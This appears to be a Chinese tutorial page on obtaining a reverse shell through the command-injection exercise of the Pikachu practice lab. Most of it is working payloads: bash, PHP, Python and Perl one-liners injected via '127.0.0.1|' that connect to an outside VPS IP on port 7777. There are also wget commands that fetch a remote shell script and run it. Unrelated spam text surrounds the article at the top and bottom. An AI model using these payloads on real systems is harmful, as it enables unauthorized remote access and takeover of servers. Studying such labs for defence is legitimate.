91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么反彈shell

發布時間:2021-12-17 16:10:04 來源:億速云 閱讀:242 作者:iii 欄目:大數據

這篇文章主要講解了“怎么反彈shell”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“怎么反彈shell”吧!

題目分析:
Pikachu的RCE處    

怎么反彈shell


whoami是www-data權限,很低的權限;

pwd可查看到當前路徑且判定是linux系統;

ls -al查看了下當前目錄下的讀寫執行權限:


怎么反彈shell


可以看出其他用戶是沒有高權限的,寫入執行權限都沒有,就不能在當前目錄下寫馬;經嘗試,bash反彈shell未能成功。


第一題:exec "ping"


方法一:     /tmp寫入bash反彈腳本執行

/tmp下有可寫可執行權限,那么寫個bash反彈腳本上去:

127.0.0.1|Echo ‘bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1’>/tmp/cdk.sh


Vps上先監聽,然后bash執行腳本:

127.0.0.1|bash /tmp/cdk.sh


怎么反彈shell


方法二:     php反彈shell

Payload:

127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'


怎么反彈shell


方法三:     python反彈shell

Payload: 

127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


怎么反彈shell


方法四:     perl反彈shell

Payload1(依賴/bin/sh): 

127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


怎么反彈shell


Payload2(不依賴/bin/sh):

127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


怎么反彈shell


第二題:exec "eval"


題目如圖:    

怎么反彈shell


自己服務器上寫個反彈shell的sh,利用wget下載到目標服務器,避免傳輸過程發生格式問題。


怎么反彈shell


利用python啟用http服務。


怎么反彈shell


執行命令:

system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')
   


怎么反彈shell


執行腳本,成功反彈shell:

system("bash /tmp/drinkwater.sh");


怎么反彈shell

感謝各位的閱讀,以上就是“怎么反彈shell”的內容了,經過本文的學習后,相信大家對怎么反彈shell這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

沿河| 上栗县| 屯昌县| 新余市| 双峰县| 望谟县| 斗六市| 周口市| 开原市| 若尔盖县| 平原县| 通河县| 大新县| 肥西县| 正宁县| 偏关县| 全州县| 富宁县| 宣武区| 建平县| 新沂市| 萍乡市| 井冈山市| 平乐县| 宣汉县| 呈贡县| 赫章县| 旬邑县| 丽江市| 蓬溪县| 乳山市| 鄱阳县| 金山区| 鹿泉市| 乐业县| 安阳市| 当涂县| 馆陶县| 大足县| 嘉定区| 淳化县|